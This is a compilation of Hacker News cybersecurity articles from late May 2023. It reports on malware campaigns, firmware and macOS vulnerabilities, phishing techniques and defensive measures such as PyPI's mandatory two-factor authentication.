31.5.23 Cryptocurrency The Hacker News
A financially motivated threat actor is actively scouring the internet for unprotected Apache NiFi instances to covertly install a cryptocurrency miner and facilitate lateral movement.
ARTICLES May 2023 MARCH(103) APRIL(113) MAY(110) JUNE(93) July(113) November(58) December(100)
Cybercriminals Targeting Apache NiFi Instances for Cryptocurrency Mining
31.5.23 Cryptocurrency The Hacker News
A financially motivated threat actor is actively scouring the internet for unprotected Apache NiFi instances to covertly install a cryptocurrency miner and facilitate lateral movement.
The findings come from the SANS Internet Storm Center (ISC), which detected a spike in HTTP requests for "/nifi" on May 19, 2023.
"Persistence is achieved via timed processors or entries to cron," said Dr. Johannes Ullrich, dean of research for SANS Technology Institute. "The attack script is not saved to the system. The attack scripts are kept in memory only."
A honeypot setup allowed the ISC to determine that the initial foothold is weaponized to drop a shell script that removes the "/var/log/syslog" file, disables the firewall, and terminates competing crypto-mining tools, before downloading and launching the Kinsing malware from a remote server.
It's worth pointing out that Kinsing has a track record of leveraging publicly disclosed vulnerabilities in publicly accessible web applications to carry out its attacks.
In September 2022, Trend Micro detailed an identical attack chain that utilized old Oracle WebLogic Server flaws (CVE-2020-14882 and CVE-2020-14883) to deliver the cryptocurrency mining malware.
Select attacks mounted by the same threat actor against exposed NiFi servers also entail the execution of a second shell script that's designed to collect SSH keys from the infected host to connect to other systems within the victim's organization.
A notable indicator of the ongoing campaign is that the actual attack and scanning activities are carried out via the IP address 109.207.200[.]43 against port 8080 and port 8443/TCP.
"Due to its use as a data processing platform, NiFi servers often have access to business-critical data," SANS ISC said. "NiFi servers are likely attractive targets as they are configured with larger CPUs to support data transformation tasks. The attack is trivial if the NiFi server is not secured."
Critical Firmware Vulnerability in Gigabyte Systems Exposes ~7 Million Devices
31.5.23 Vulnerebility The Hacker News
Cybersecurity researchers have found "backdoor-like behavior" within Gigabyte systems, which they say enables the UEFI firmware of the devices to drop a Windows executable and retrieve updates in an unsecure format.
Firmware security firm Eclypsium said it first detected the anomaly in April 2023. Gigabyte has since acknowledged and addressed the issue.
"Most Gigabyte firmware includes a Windows Native Binary executable embedded inside of the UEFI firmware," John Loucaides, senior vice president of strategy at Eclypsium, told The Hacker News.
"The detected Windows executable is dropped to disk and executed as part of the Windows startup process, similar to the LoJack double agent attack. This executable then downloads and runs additional binaries via insecure methods."
"Only the intention of the author can distinguish this sort of vulnerability from a malicious backdoor," Loucaides added.
The executable, per Eclypsium, is embedded into UEFI firmware and written to disk by firmware as part of the system boot process and subsequently launched as an update service.
The .NET-based application, for its part, is configured to download and execute a payload from Gigabyte update servers over plain HTTP, thereby exposing the process to adversary-in-the-middle (AitM) attacks via a compromised router.
Loucaides said the software "seems to have been intended as a legitimate update application," noting the issue potentially impacts "around 364 Gigabyte systems with a rough estimate of 7 million devices."
With threat actors constantly on the lookout for ways to remain undetected and leave a minimal intrusion footprint, vulnerabilities in the privileged firmware update mechanism could pave the way for stealthy UEFI bootkits and implants that can subvert all security controls running in the operating system plane.
To make matters worse, since the UEFI code resides on the motherboard, malware injected to the firmware can persist even if drives are wiped and the operating system is reinstalled.
Organizations are advised to apply the latest firmware updates to minimize potential risks. It's also advised to inspect and disable the "APP Center Download & Install" feature in UEFI/BIOS Setup and set a BIOS password to deter malicious changes.
"Firmware updates have notoriously low uptake with end users," Loucaides said. "Therefore, it is easy to understand thinking that an update application in firmware may help."
"However, the irony of a highly insecure update application, backed into firmware to automatically download and run a payload, is not lost."
Beware of Ghost Sites: Silent Threat Lurking in Your Salesforce Communities
31.5.23 Cyber The Hacker News
Improperly deactivated and abandoned Salesforce Sites and Communities (aka Experience Cloud) could pose severe risks to organizations, leading to unauthorized access to sensitive data.
Data security firm Varonis dubbed the abandoned, unprotected, and unmonitored resources "ghost sites."
"When these Communities are no longer needed, though, they are often set aside but not deactivated," Varonis Threat Labs researchers said in a new report shared with The Hacker News.
"Because these unused sites are not maintained, they aren't tested against vulnerabilities, and Admins fail to update the site's security measures according to newer guidelines."
Varonis said it found many of these deactivated (but still active) sites still fetching new data, thereby allowing threat actors to extract data by manipulating the host header in the HTTP request.
Identifying the complete internal URLs associated with the sites is challenging but not impossible, as an adversary could leverage tools like SecurityTrails that track changes to DNS records.
Compounding the risk further is the fact that the obsolete sites lack the latest security protections, making them an ideal target for threat actors looking to siphon sensitive information.
"The exposed data is not restricted to only old data from when the site was in use; it also includes new records that were shared with the guest user, due to the sharing configuration in their Salesforce environment," the researchers said.
To mitigate the threats associated with ghost sites, organizations are advised to keep track of all Salesforce sites and their respective users' permissions. It's also recommended to properly deactivate sites that are no longer in use.
Microsoft Details Critical Apple macOS Vulnerability Allowing SIP Protection Bypass
31.5.23 Apple The Hacker News
Microsoft has shared details of a now-patched flaw in Apple macOS that could be abused by threat actors with root access to bypass security enforcements and perform arbitrary actions on affected devices.
Specifically, the flaw dubbed Migraine and tracked as CVE-2023-32369 could be abused to get around a key security measure called System Integrity Protection (SIP), or "rootless," which limits the actions the root user can perform on protected files and folders.
"The most straight-forward implication of a SIP bypass is that [...] an attacker can create files that are protected by SIP and therefore undeletable by ordinary means," Microsoft researchers Jonathan Bar Or, Michael Pearse, and Anurag Bohra said.
Even worse, it could be exploited to gain arbitrary kernel code execution and even access sensitive data by replacing databases that manage Transparency, Consent, and Control (TCC) policies.
The bypass is made possible by leveraging a built-in macOS tool called Migration Assistant to activate the migration process via an AppleScript that's designed to ultimately launch an arbitrary payload.
This, in turn, stems from the fact that systemmigrationd the daemon used to handle device transfer comes with the com.apple.rootless.install.heritable entitlement, allowing all its child processes, including bash and perl, to bypass SIP checks.
As a result, a threat actor already with code execution capabilities as root could trigger systemmigrationd to run perl, which could then be used to run a malicious shell script as the migration process is underway.
Following responsible disclosure, the vulnerability was addressed by Apple as part of updates (macOS Ventura 13.4, macOS Monterey 12.6.6, and macOS Big Sur 11.7.7) shipped on May 18, 2023.
The iPhone maker described CVE-2023-32369 as a logic issue that could allow a malicious app to modify protected parts of the file system.
Migraine is the latest addition to the list of macOS security bypasses that have been documented under the names Shrootless (CVE-2021-30892, CVSS score: 5.5), powerdir (CVE-2021-30970, CVSS score: 5.5), and Achilles (CVE-2022-42821, CVSS score: 5.5).
"The implications of arbitrary SIP bypasses are serious, as the potential for malware authors is significant," the researchers said.
"Bypassing SIP could lead to serious consequences, such as increasing the potential for attackers and malware authors to successfully install rootkits, create persistent malware, and expand the attack surface for additional techniques and exploits."
The findings come as Jamf Threat Labs disclosed details of a type confusion flaw in the macOS kernel that could be weaponized by a rogue app installed on the device to execute arbitrary code with kernel privileges.
Labeled ColdInvite (aka CVE-2023-27930), the flaw "can be exploited to leverage the co-processor in order to obtain read/write privileges to the kernel, allowing a bad actor to get closer to realizing their ultimate goal of fully compromising the device."
Dark Pink APT Group Leverages TelePowerBot and KamiKakaBot in Sophisticated Attacks
31.5.23 APT The Hacker News
The threat actor known as Dark Pink has been linked to five new attacks aimed at various entities in Belgium, Brunei, Indonesia, Thailand, and Vietnam between February 2022 and April 2023.
This includes educational institutions, government agencies, military bodies, and non-profit organizations, indicating the adversarial crew's continued focus on high-value targets.
Dark Pink, also called Saaiwc Group, is an advanced persistent threat (APT) actor believed to be of Asia-Pacific origin, with attacks targeting entities primarily located in East Asia and, to a lesser extent, in Europe.
The group employs a set of custom malware tools such as TelePowerBot and KamiKakaBot that provide various functions to exfiltrate sensitive data from compromised hosts.
"The group uses a range of sophisticated custom tools, deploys multiple kill chains relying on spear-phishing emails," Group-IB security researcher Andrey Polovinkin said in a technical report shared with The Hacker News.
"Once the attackers gain access to a target's network, they use advanced persistence mechanisms to stay undetected and maintain control over the compromised system."
The findings also illustrate some key modifications to the Dark Pink attack sequence to impede analysis as well as accommodate improvements to KamiKakaBot, which executes commands from a threat actor-controlled Telegram channel via a Telegram bot.
The latest version, notably, splits its functionality into two distinct parts: One for controlling devices and the other for harvesting valuable information.
The Singapore-headquartered company said it also identified a new GitHub account associated with the threat actor that hosts PowerShell scripts, ZIP archives, and custom malware for subsequent installation onto victim machines. These modules were uploaded between January 9, 2023, and April 11, 2023.
Besides using Telegram for command-and-control, Dark Pink has been observed exfiltrating stolen data over HTTP using a service called webhook[.]site. Another notable aspect is the use of an Microsoft Excel add-in to ensure the persistence of TelePowerBot within the infected host.
"With webhook[.]site, it is possible to set up temporary endpoints in order to capture and view incoming HTTP requests," Polovinkin noted. "The threat actor created temporary endpoints and sent sensitive data stolen from victims."
Dark Pink, its espionage motives notwithstanding, remains shrouded in mystery. That said, it's suspected the hacking crew's victimology footprint could be broader than previously assumed.
While the latest discovery brings the attack tally to 13 (counting the five new victims) since mid-2021, they also indicate the adversary's attempts to maintain a low profile for stealthiness. They are also a sign of the threat actors carefully selecting their targets and keeping the number of attacks at a minimum to reduce the likelihood of exposure.
"The fact that two attacks were executed in 2023 indicates that Dark Pink remains active and poses an ongoing risk to organizations," Polovinkin said. "Evidence shows that the cybercriminals behind these attacks keep updating their existing tools in order to remain undetected."
RomCom RAT Using Deceptive Web of Rogue Software Sites for Covert Attacks
31.5.23 Virus The Hacker News
The threat actors behind RomCom RAT are leveraging a network of fake websites advertising rogue versions of popular software at least since July 2022 to infiltrate targets.
Cybersecurity firm Trend Micro is tracking the activity cluster under the name Void Rabisu, which is also known as Tropical Scorpius (Unit 42) and UNC2596 (Mandiant).
"These lure sites are most likely only meant for a small number of targets, thus making discovery and analysis more difficult," security researchers Feike Hacquebord, Stephen Hilt, Fernando Merces, and Lord Alfred Remorin said.
Some of the impersonated apps spotted so far include AstraChat, Devolutions' Remote Desktop Manager, Gimp, GoTo Meeting, KeePass, OpenAI ChatGPT, Signal, Veeam Backup & Replication, and WinDirStat.
RomCom RAT was first chronicled by Palo Alto Networks Unit 42 in August 2022, linking it to a financially motivated group deploying Cuba Ransomware (aka COLDDRAW). It's worth noting that there is no evidence to suggest that the ransomware gang has any connection or affiliation with the Republic of Cuba.
The remote access trojan has since been used heavily in attacks targeting Ukrainian state bodies and military systems via spoofed versions of legitimate software. Other isolated targets have been located in the Americas and Asia.
Void Rabisu has also been observed abusing Google Ads to trick users into visiting the lure sites as part of narrowly targeted attacks, making it the latest addition in a long list of threat actors finding fresh avenues for gaining initial access into victims' systems.
"RomCom used spear-phishing against a member of a European parliament in March 2022, but targeted a European defense company in October 2022 with a Google Ads advertisement that led to an intermediary landing site that would redirect to a RomCom lure site," Trend Micro said.
This points to the adversary mixing its targeting methodology to encompass tactics associated with both cybercrime actors and nation-state groups.
The shift in RomCom RAT's usage as a backdoor for targeted intrusions has been complemented by significant improvements to the malware that scales up the number of supported commands from 20 to 49, enabling it to exert total control over the compromised hosts.
This also includes the ability to download additional payloads to take screenshots, grab crypto wallet data, siphon chat messages and FTP credentials, and use a browser password stealer dubbed StealDeal.
Another notable aspect of the attacks is the use of certificates to lend credibility to the malicious software installers, with samples signed by seemingly innocuous companies based in the U.S. and Canada.
"The line is blurring between cybercrime driven by financial gain and APT attacks motivated by geopolitics, espionage, disruption, and warfare," the researchers said.
"Since the rise of Ransomware-as-a-Service (RaaS), cybercriminals are not using advanced tactics and targeted attacks that were previously thought to be the domain of APT actors. Inversely, tactics and techniques that were previously used by financially motivated actors are increasingly being used in attacks with geopolitical goals."
Alert: Hackers Exploit Barracuda Email Security Gateway 0-Day Flaw for 7 Months
31.5.23 Exploit The Hacker News
Enterprise security firm Barracuda on Tuesday disclosed that a recently patched zero-day flaw in its Email Security Gateway (ESG) appliances had been abused by threat actors since October 2022 to backdoor the devices.
The latest findings show that the critical vulnerability, tracked as CVE-2023-2868 (CVSS score: N/A), has been actively exploited for at least seven months prior to its discovery.
The flaw, which Barracuda identified on May 19, 2023, affects versions 5.1.3.001 through 9.2.0.006 and could allow a remote attacker to achieve code execution on susceptible installations. Patches were released by Barracuda on May 20 and May 21.
"CVE-2023-2868 was utilized to obtain unauthorized access to a subset of ESG appliances," the network and email security company said in an updated advisory.
"Malware was identified on a subset of appliances allowing for persistent backdoor access. Evidence of data exfiltration was identified on a subset of impacted appliances."
Three different malware strains have been discovered to date -
SALTWATER - A trojanized module for the Barracuda SMTP daemon (bsmtpd) that's equipped to upload or download arbitrary files, execute commands, as well as proxy and tunnel malicious traffic to fly under the radar.
SEASPY - An x64 ELF backdoor that offers persistence capabilities and is activated by means of a magic packet.
SEASIDE - A Lua based module for bsmtpd establish reverse shells via SMTP HELO/EHLO commands sent via the malware's command-and-control (C2) server.
Source code overlaps have been identified between SEASPY and an open source backdoor called cd00r, according to Google-owned Mandiant, which is investigating the incident. The attacks have not been attributed to a known threat actor or group.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), last week, also added the bug to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the fixes by June 16, 2023.
Barracuda did not disclose how many organizations were breached, but noted they were directly contacted with mitigation guidance. It also warned that the ongoing probe may unearth additional users who may have been affected.
Hackers Win $105,000 for Reporting Critical Security Flaws in Sonos One Speakers
30.5.23 Vulnerebility The Hacker News
Multiple security flaws uncovered in Sonos One wireless speakers could be potentially exploited to achieve information disclosure and remote code execution, the Zero Day Initiative (ZDI) said in a report published last week.
The vulnerabilities were demonstrated by three different teams from Qrious Secure, STAR Labs, and DEVCORE at the Pwn2Own hacking contest held in Toronto late last year, netting them $105,000 in monetary rewards.
The list of four flaws, which impact Sonos One Speaker 70.3-35220, is below -
CVE-2023-27352 and CVE-2023-27355 (CVSS scores: 8.8) - Unauthenticated flaws that allow network-adjacent attackers to execute arbitrary code on affected installations.
CVE-2023-27353 and CVE-2023-27354 (CVSS score: 6.5) - Unauthenticated flaws that allow network-adjacent attackers to disclose sensitive information on affected installations.
While CVE-2023-27352 stems from when processing SMB directory query commands, CVE-2023-27355 exists within the MPEG-TS parser.
Successful exploitation of both shortcomings could permit an attacker to execute arbitrary code in the context of the root user.
Both the information disclosure flaws can be combined separately with other flaws in the systems to achieve code execution with elevated privileges.
Following responsible disclosure on December 29, 2022, the flaws were addressed by Sonos as part of Sonos S2 and S1 software versions 15.1 and 11.7.1, respectively. Users are recommended to apply the latest patches to mitigate potential risks.
CAPTCHA-Breaking Services with Human Solvers Helping Cybercriminals Defeat Security
30.5.23 Security The Hacker News
Cybersecurity researchers are warning about CAPTCHA-breaking services that are being offered for sale to bypass systems designed to distinguish legitimate users from bot traffic.
"Because cybercriminals are keen on breaking CAPTCHAs accurately, several services that are primarily geared toward this market demand have been created," Trend Micro said in a report published last week.
"These CAPTCHA-solving services don't use [optical character recognition] techniques or advanced machine learning methods; instead, they break CAPTCHAs by farming out CAPTCHA-breaking tasks to actual human solvers."
CAPTCHA short for Completely Automated Public Turing test to tell Computers and Humans Apart is a tool for differentiating real human users from automated users with the goal of combating spam and restricting fake account creation.
While CAPTCHA mechanisms can be a disruptive user experience, they are seen as an effective means to counter attacks from bot-originating web traffic.
The illicit CAPTCHA-solving services work by funneling requests sent by customers and delegating them to their human solvers, who work out the solution and submit the results back to the users.
This, in turn, is achieved by calling an API to submit the CAPTCHA and invoking a second API to get the results.
"This makes it easy for the customers of CAPTCHA-breaking services to develop automated tools against online web services," security researcher Joey Costoya said. "And because actual humans are solving CAPTCHAs, the purpose of filtering out automated bot traffic through these tests are rendered ineffective."
That's not all. Threat actors have been observed purchasing CAPTCHA-breaking services and combining them with proxyware offerings to obscure the originating IP address and evade antibot barriers.
Proxyware, although marketed as a utility to share a user's unused internet bandwidth with other parties in return for a "passive income," essentially turns the devices running them into residential proxies.
In one instance of a CAPTCHA-breaking service targeting popular social commerce marketplace Poshmark, the task requests emanating from a bot are routed via a proxyware network.
"CAPTCHAs are common tools used to prevent spam and bot abuse, but the increasing use of CAPTCHA-breaking services has made CAPTCHAs less effective," Costoya said. "While online web services can block abusers' originating IPs, the rise of proxyware adoption renders this method as toothless as CAPTCHAs."
To mitigate such risks, online web services are recommended to supplement CAPTCHAs and IP blocklisting with other anti-abuse tools.
Sneaky DogeRAT Trojan Poses as Popular Apps, Targets Indian Android Users
30.5.23 Virus The Hacker News
A new open source remote access trojan (RAT) called DogeRAT targets Android users primarily located in India as part of a sophisticated malware campaign.
The malware is distributed via social media and messaging platforms under the guise of legitimate applications like Opera Mini, OpenAI ChatGOT, and Premium versions of YouTube, Netflix, and Instagram.
"Once installed on a victim's device, the malware gains unauthorized access to sensitive data, including contacts, messages, and banking credentials," cybersecurity firm CloudSEK said in a Monday report.
"It can also take control of the infected device, enabling malicious actions such as sending spam messages, making unauthorized payments, modifying files, and even remotely capturing photos through the device's cameras."
DogeRAT, like many other malware-as-a-service (MaaS) offerings, is promoted by its India-based developer through a Telegram channel that has more than 2,100 subscribers since it was created on June 9, 2022.
This also includes a premium subscription that's sold for dirt-cheap prices ($30) with additional capabilities such as taking screenshots, stealing images, capturing clipboard content, and logging keystrokes.
In a further attempt to make it more accessible to other criminal actors, the free version of DogeRAT has been made available on GitHub, alongside screenshots and video tutorials showcasing its functions.
"We do not endorse any illegal or unethical use of this tool," the developer states in the repository's README.md file. "The user assumes all responsibility for the use of this software."
Upon installation, the Java-based malware requests for intrusive permissions to perform its data-gathering objectives, before exfiltrating it to a Telegram bot.
"This campaign is a stark reminder of the financial motivation driving scammers to continually evolve their tactics," CloudSEK researcher Anshuman Das said.
"They are not just limited to creating phishing websites, but also distributing modified RATs or repurposing malicious apps to execute scam campaigns that are low-cost and easy to set up, yet yield high returns."
The findings come as Google-owned Mandiant detailed a new Android backdoor called LEMONJUICE that's designed to enable remote control of and access to a compromised device.
"The malware is capable of tracking device location, recording the microphone, retrieving contact lists, accessing call, SMS, clipboard, and notification logs, viewing installed applications, downloading and uploading files, viewing connectivity status, and executing additional commands from the C2 server," researcher Jared Wilson said.
In a related development, Doctor Web uncovered over 100 apps containing a spyware component called SpinOk that have been collectively downloaded more than 421 million times via the Google Play Store.
The module, which is distributed as a marketing software development kit (SDK), is engineered to collect sensitive information stored in the devices as well as copy and substitute clipboard contents.
Some of the most popular apps that have been found to contain the SpinOk trojan are Noizz, Zapya, VFly, MVBit, Biugo, Crazy Drop, Cashzine, Fizzo Novel, CashEM, and Tick.
New BrutePrint Attack Lets Attackers Unlock Smartphones with Fingerprint Brute-Force
30.5.23 Attack The Hacker News
Researchers have discovered an inexpensive attack technique that could be leveraged to brute-force fingerprints on smartphones to bypass user authentication and seize control of the devices.
The approach, dubbed BrutePrint, bypasses limits put in place to counter failed biometric authentication attempts by weaponizing two zero-day vulnerabilities in the smartphone fingerprint authentication (SFA) framework.
The flaws, Cancel-After-Match-Fail (CAMF) and Match-After-Lock (MAL), leverage logical defects in the authentication framework, which arises due to insufficient protection of fingerprint data on the Serial Peripheral Interface (SPI) of fingerprint sensors.
The result is a "hardware approach to do man-in-the-middle (MitM) attacks for fingerprint image hijacking," researchers Yu Chen and Yiling He said in a research paper. "BrutePrint acts as a middleman between fingerprint sensor and TEE [Trusted Execution Environment]."
The goal, at its core, is to be able to perform an unlimited number of fingerprint image submissions until there is a match. It, however, presupposes that a threat actor is already in possession of the target device in question.
Additionally, it requires the adversary to be in possession of a fingerprint database and a setup comprising a microcontroller board and an auto-clicker that can hijack data sent by a fingerprint sensor to pull off the attack for as low as $15.
The first of the two vulnerabilities that render this attack possible is CAMF, which allows for increasing the fault tolerance capabilities of the system by invalidating the checksum of the fingerprint data, thereby giving an attacker unlimited tries.
MAL, on the other hand, exploits a side-channel to infer matches of the fingerprint images on the target devices, even when it enters a lockout mode following too many repeated login attempts.
"Although the lockout mode is further checked in Keyguard to disable unlocking, the authentication result has been made by TEE," the researchers explained.
"As Success authentication result is immediately returned when a matched sample is met, it's possible for side-channel attacks to infer the result from behaviors such as response time and the number of acquired images."
In an experimental setup, BrutePrint was evaluated against 10 different smartphone models from Apple, Huawei, OnePlus, OPPO, Samsung, Xiaomi, and vivo, yielding infinite attempts on Android and HarmonyOS, and 10 additional attempts on iOS devices.
The findings come as a group of academics detailed a hybrid side-channel that takes advantage of the "three-way tradeoff between execution speed (i.e., frequency), power consumption, and temperature" in modern system-on-chips (SoCs) and GPUs to conduct "browser-based pixel stealing and history sniffing attacks" against Chrome 108 and Safari 16.2.
The attack, called Hot Pixels, takes advantage of this behavior to mount website fingerprinting attacks and employ JavaScript code to harvest a user's browsing history.
This is accomplished by designing a computationally heavy SVG filter to leak pixel colors by measuring the rendering times and stealthily harvest the information with an accuracy as high as 94%.
The issues have been acknowledged by Apple, Google, AMD, Intel, Nvidia, Qualcomm. The researchers also recommend "prohibiting SVG filters from being applied to iframes or hyperlinks" and preventing unprivileged access to sensor readings.
BrutePrint and Hot Pixels also follow Google's discovery of 10 security defects in Intel's Trust Domain Extensions (TDX) that could lead to arbitrary code execution, denial-of-service conditions, and loss of integrity.
On a related note, Intel CPUs have also been found susceptible to a side-channel attack that makes use of variations in execution time caused by changing the EFLAGS register during transient execution to decode data without relying on the cache.
AceCryptor: Cybercriminals' Powerful Weapon, Detected in 240K+ Attacks
30.5.23 Virus The Hacker News
A crypter (alternatively spelled cryptor) malware dubbed AceCryptor has been used to pack numerous strains of malware since 2016.
Slovak cybersecurity firm ESET said it identified over 240,000 detections of the crypter in its telemetry in 2021 and 2022. This amounts to more than 10,000 hits per month.
Some of the prominent malware families contained within AceCryptor are SmokeLoader, RedLine Stealer, RanumBot, Raccoon Stealer, Stop ransomware, and Amadey, among others.
The countries with the most detections include Peru, Egypt, Thailand, Indonesia, Turkey, Brazil, Mexico, South Africa, Poland, and India.
AceCryptor was first highlighted by Avast in August 2022, detailing the use of the malware to distribute Stop ransomware and RedLine Stealer on Discord in the form of 7-Zip files.
Crypters are similar to packers, but instead of using compression, they are known to obfuscate the malware code with encryption to make detection and reverse engineering a lot more challenging.
They are also indicative of a trend where malware authors advertise such capabilities for other threat actors, less technically sophisticated or otherwise, who are looking to armor their creations.
"Even though threat actors can create and maintain their own custom cryptors, for crimeware threat actors it often may be a time-consuming or technically difficult task to maintain their cryptor in a so-called FUD (fully undetectable) state," ESET researcher Jakub Kaloθ said.
"Demand for such protection has created multiple crypter-asa-service (CaaS) options that pack malware."
AceCryptor-packed malware is delivered via trojanized installers of pirated software, spam emails bearing malicious attachments, or other malware that has already compromised a host.
It's also suspected to be sold as a CaaS, owing to the fact that it's used by multiple threat actors to propagate a diverse range of malware families.
The crypter is heavily obfuscated, incorporating a three-layer architecture to progressively decrypt and unpack each stage and ultimately launch the payload, while also featuring anti-VM, anti-debugging, and anti-analysis techniques to fly under the radar.
The second layer, according to ESET, is said to have been introduced in 2019 as an extra protection mechanism.
The findings come as another crypter service codenamed ScrubCrypt has been leveraged by cryptojacking groups like the 8220 Gang to illicitly mine cryptocurrency on infected hosts.
Earlier this January, Check Point also unearthed a packer known as TrickGate that's used to deploy a wide range of malware such as TrickBot, Emotet, AZORult, Agent Tesla, FormBook, Cerber, Maze, and REvil for over six years.
New GobRAT Remote Access Trojan Targeting Linux Routers in Japan
30.5.23 Virus The Hacker News
Linux routers in Japan are the target of a new Golang remote access trojan (RAT) called GobRAT.
"Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC) said in a report published today.
The compromise of an internet-exposed router is followed by the deployment of a loader script that acts as a conduit for delivering GobRAT, which, when launched, masquerades as the Apache daemon process (apached) to evade detection.
The loader is also equipped to disable firewalls, establish persistence using the cron job scheduler, and register an SSH public key in the .ssh/authorized_keys file for remote access.
GobRAT, for its part, communicates with a remote server via the Transport Layer Security (TLS) protocol to receive as many as 22 different encrypted commands for execution.
Some of the major commands are as follows -
Obtain machine information
Execute reverse shell
Read/write files
Configure new command-and-control (C2) and protocol
Start SOCKS5 proxy
Execute file in /zone/frpc, and
Attempt to login to sshd, Telnet, Redis, MySQL, PostgreSQL services running on another machine
The findings come nearly three months after Lumen Black Lotus Labs revealed that business-grade routers have been victimized to spy on victims in Latin America, Europe, and North America using a malware called HiatusRAT.
Don't Click That ZIP File! Phishers Weaponizing .ZIP Domains to Trick Victims
30.5.23 Phishing The Hacker News
A new phishing technique called "file archiver in the browser" can be leveraged to "emulate" a file archiver software in a web browser when a victim visits a .ZIP domain.
"With this phishing attack, you simulate a file archiver software (e.g., WinRAR) in the browser and use a .zip domain to make it appear more legitimate," security researcher mr.d0x disclosed last week.
Threat actors, in a nutshell, could create a realistic-looking phishing landing page using HTML and CSS that mimics legitimate file archive software, and host it on a .zip domain, thus elevating social engineering campaigns.
In a potential attack scenario, a miscreant could resort to such trickery to redirect users to a credential harvesting page when a file "contained" within the fake ZIP archive is clicked.
"Another interesting use case is listing a non-executable file and when the user clicks to initiate a download, it downloads an executable file," mr.d0x noted. "Let's say you have an 'invoice.pdf' file. When a user clicks on this file, it will initiate the download of a .exe or any other file."
On top of that, the search bar in the Windows File Explorer can emerge as a sneaky conduit where searching for a non-existent .ZIP file opens it directly in the web browser should the file name correspond to a legitimate .zip domain.
"This is perfect for this scenario since the user would be expecting to see a ZIP file," the researcher said. "Once the user performs this, it will auto-launch the .zip domain which has the file archive template, appearing pretty legitimate."
The development comes as Google rolled out eight new top-level domains (TLDs), including ".zip" and ".mov," that have raised some concerns that it could invite phishing and other types of online scams.
This is because .ZIP and .MOV are both legitimate file extension names, potentially confusing unsuspecting users into visiting a malicious website rather than opening a file and dupe them into accidentally downloading malware.
"ZIP files are often used as part of the initial stage of an attack chain, typically being downloaded after a user accesses a malicious URL or opens an email attachment," Trend Micro said.
"Beyond ZIP archives being used as a payload, it's also likely that malicious actors will use ZIP-related URLs for downloading malware with the introduction of the .zip TLD."
While reactions are decidedly mixed on the risk posed as a result of confusion between domain names and file names, it's expected to equip actors acting in bad faith with yet another vector for phishing.
The discovery also comes as cybersecurity company Group-IB said it detected a 25% surge in the use of phishing kits in 2022, identifying 3,677 unique kits, when compared to the preceding year.
Of particular interest is the uptick in the trend of using Telegram to collect stolen data, almost doubling from 5.6% in 2021 to 9.4% in 2022.
That's not all. Phishing attacks are also becoming more sophisticated, with cybercriminals increasingly focusing on packing the kits with detection evasion capabilities such as the use of antibots and dynamic directories.
"Phishing operators create random website folders that are only accessible by the recipient of a personalized phishing URL and cannot be accessed without the initial link," the Singapore-headquartered firm said.
"This technique allows phishers to evade detection and blacklisting as the phishing content will not reveal itself."
According to a new report from Perception Point, the number of advanced phishing attacks attempted by threat actors in 2022 rose 356%. The total number of attacks increased by 87% over the course of the year.
This continued evolution of phishing schemes is exemplified by a fresh wave of attacks that have been observed leveraging compromised Microsoft 365 accounts and restricted-permission message (.rpmsg) encrypted emails to harvest users' credentials.
"The use of encrypted .rpmsg messages means that the phishing content of the message, including the URL links, are hidden from email scanning gateways," Trustwave researchers Phil Hay and Rodel Mendrez explained.
Another instance highlighted by Proofpoint entails the possible abuse of legitimate features in Microsoft Teams to facilitate phishing and malware delivery, including utilizing meeting invites post-compromise by replacing default URLs with malicious links via API calls.
"A different approach that attackers can utilize, given access to a user's Teams token, is using Teams' API or user interface to weaponize existing links in sent messages," the enterprise security firm noted.
"This could be done by simply replacing benign links with links pointing to nefarious websites or malicious resources."
PyPI Implements Mandatory Two-Factor Authentication for Project Owners
30.5.23 Security The Hacker News
The Python Package Index (PyPI) announced last week that every account that maintains a project on the official third-party software repository will be required to turn on two-factor authentication (2FA) by the end of the year.
"Between now and the end of the year, PyPI will begin gating access to certain site functionality based on 2FA usage," PyPI administrator Donald Stufft said. "In addition, we may begin selecting certain users or projects for early enforcement."
The enforcement also includes organization maintainers, but does not extend to every single user of the service.
The goal is to neutralize the threats posed by account takeover attacks, which an attacker can leverage to distribute trojanized versions of popular packages to poison the software supply chain and deploy malware on a large scale.
PyPI, like other open source repositories such as npm, has witnessed innumerable instances of malware and package impersonation.
Earlier this month, Fortinet FortiGuard Labs discovered over 30 Python libraries that incorporated various features to connect to arbitrary remote URLs and steal sensitive data from compromised machines.
The development comes nearly a year after PyPI made 2FA mandatory for critical project maintainers. The registry is home to 457,125 projects and 704,458 users.
According to cloud monitoring service provider Datadog, 9,580 users and 4,541 projects have been identified as critical, with 2FA enabled in total for 38,248 users to date.
New Stealthy Bandit Stealer Targeting Web Browsers and Cryptocurrency Wallets
28.5.23 Cryptocurrency The Hacker News
A new stealthy information stealer malware called Bandit Stealer has caught the attention of cybersecurity researchers for its ability to target numerous web browsers and cryptocurrency wallets.
"It has the potential to expand to other platforms as Bandit Stealer was developed using the Go programming language, possibly allowing cross-platform compatibility," Trend Micro said in a Friday report.
The malware is currently focused on targeting Windows by using a legitimate command-line tool called runas.exe that allows users to run programs as another user with different permissions.
The goal is to escalate privileges and execute itself with administrative access, thereby effectively bypassing security measures to harvest wide swathes of data.
That said, Microsoft's access control mitigations to prevent unauthorized execution of the tool means an attempt to run the malware binary as an administrator requires providing the necessary credentials.
"By using the runas.exe command, users can run programs as an administrator or any other user account with appropriate privileges, provide a more secure environment for running critical applications, or perform system-level tasks," Trend Micro said.
"This utility is particularly useful in situations where the current user account does not have sufficient privileges to execute a specific command or program."
Bandit Stealer incorporates checks to determine if it's running in a sandbox or virtual environment and terminates a list of blocklisted processes to conceal its presence on the infected system.
It also establishes persistence by means of Windows Registry modifications before commencing its data collection activities that include harvesting personal and financial data stored in web browsers and crypto wallets.
Bandit Stealer is said to be distributed via phishing emails containing a dropper file that opens a seemingly innocuous Microsoft Word attachment as a distraction maneuver while triggering the infection in the background.
Trend Micro said it also detected a fake installer of Heart Sender, a service that automates the process of sending spam emails and SMS messages to numerous recipients, that's used to trick users into launching the embedded malware.
The development comes as the cybersecurity firm uncovered a Rust-based info stealer targeting Windows that leverages a GitHub Codespaces webhook controlled by the attacker as an exfiltration channel to obtain a victim's web browser credentials, credit cards, cryptocurrency wallets, and Steam and Discord tokens.
The malware, in what's a relatively uncommon tactic, achieves persistence on the system by modifying the installed Discord client to inject JavaScript code designed to capture information from the application.
